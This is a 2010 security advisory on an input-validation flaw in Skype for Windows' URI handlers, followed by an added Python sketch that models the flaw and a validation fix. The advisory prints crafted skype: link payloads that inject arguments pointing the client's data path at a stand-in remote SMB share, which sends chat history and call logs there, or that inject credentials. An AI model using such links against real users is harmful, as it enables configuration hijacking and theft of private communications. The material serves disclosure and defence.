Skype - URI Handler Input Validation

Date released: March 11, 2010

Affected software: Skype for Windows: All releases prior to v4.2.0.1.55 (v4.2 hotfix #1)

Provided and/or discovered by:
Paul Craig, Security-Assessment.com Ltd.
Independently reported by Anonymous via ZDI.

Description

The Windows Skype client implements two URI handlers, Skype: and Skype-Plugins:. Both URI handlers allow easy browser integration and are supported by all modern browsers. When a Skype link is clicked, the skype.exe process is spawned with the /URI: command line argument, followed by the user-specified phone number or contact name.

For example, clicking the link Skype:PaulCraig will spawn the process Skype.exe "/URI:Skype:paulcraig"

Due to a flaw in the user input validation performed by Skype, it is possible to append additional command line arguments, which are then processed when Skype is launched.

A remote user can craft a link that, when clicked, spawns skype.exe on the client with a Datapath location that resides on a remote SMB share. The Skype client will load any configuration or security policy present there and save the user's Skype account information to the remote share.

This allows a remote user to control the Skype configuration and security policy of the local Skype client instance. Settings such as a remote proxy can be defined, which could be used to man-in-the-middle Skype communications.

Exploitation

Successful exploitation requires that a Skype user is tricked into clicking a specially crafted "skype:" URI and may also depend on the browser being used. Internet Explorer 6, 7, or 8 and Chrome are reported as possible vectors.

Skype permits a raw binary byte in the URI, and that byte is subsequently treated as whitespace when the Skype.exe command line arguments are parsed. This yields an argument separator that is not a traditional whitespace character. This whitespace-character injection can be used to pass additional command line arguments to the Skype.exe process.

The example below illustrates this:

<a href=skype:A"0x01/secondary0x01/datapath:"\\remotehost\share\exploit>Click Me</a>

where 0x01 represents the RAW binary byte value 0x01.

This URL will retrieve the Skype configuration from the remote host ‘remotehost’. Once a user has authenticated using Skype, the Skype client will download their chat history and call logs to the remote share.

Other arguments such as /username and /password can also be included using the same method of whitespace injection. This is illustrated below:

<a href=skype:A"0x01/secondary0x01/username:"test"0x01/password:"test>Click Me</a>

The bytes 0x01-0x07 were found to function as a replacement for a whitespace character.
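As an added illustration that is not part of the advisory: a small Python model of the argument splitting described above (control bytes 0x01-0x07 acting as whitespace), next to the kind of strict allowlist check a URI handler should apply to the target before it ever reaches a command line. The tokenizer is a simplified model, not Skype's code, and the allowlist pattern is an assumption, not Skype's actual fix.

```python
import re

# Bytes the advisory reports as working in place of whitespace (0x01-0x07),
# plus ordinary space and tab. Constructed model, not Skype's implementation.
FAKE_WHITESPACE = set(range(0x01, 0x08)) | {0x20, 0x09}


def flawed_split_args(cmdline: bytes) -> list:
    """Model of the flawed tokenizer: outside double quotes, any byte in
    FAKE_WHITESPACE ends the current argument, so a crafted URI target yields
    extra arguments. Quotes toggle quoting and are dropped (simplified)."""
    args, current, in_quotes = [], bytearray(), False
    for b in cmdline:
        if b == 0x22:  # double quote
            in_quotes = not in_quotes
        elif b in FAKE_WHITESPACE and not in_quotes:
            if current:
                args.append(bytes(current))
                current = bytearray()
        else:
            current.append(b)
    if current:
        args.append(bytes(current))
    return args


def build_cmdline(uri: bytes) -> bytes:
    """How the advisory says the browser launches Skype: '/URI:' plus the link."""
    return b'skype.exe "/URI:' + uri + b'"'


# Assumed allowlist for a contact name or phone number: anything else (control
# bytes, quotes, slashes, whitespace) is rejected before launching a process.
SAFE_TARGET = re.compile(rb"[A-Za-z0-9._+-]{1,64}")


def validate_skype_target(uri: bytes) -> bool:
    """Return True only if uri is 'skype:' followed by a plain contact/number."""
    scheme, sep, target = uri.partition(b":")
    if sep != b":" or scheme.lower() != b"skype":
        return False
    return SAFE_TARGET.fullmatch(target) is not None
```

Running the advisory's datapath link through flawed_split_args shows /secondary and /datapath: appearing as separate arguments, while validate_skype_target rejects it and accepts plain targets such as skype:PaulCraig.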

Solution

Skype has created a fix for this vulnerability, which has been included as part of Skype v4.2 hotfix #1. Update to the latest version of Skype. For more information on the new release of Skype, please refer to the release notes:

http://share.skype.com/sites/garage/2010/03/10/ReleaseNotes_4.2.0.155.pdf

 

References

http://secunia.com/advisories/38908/
http://www.security-assessment.com/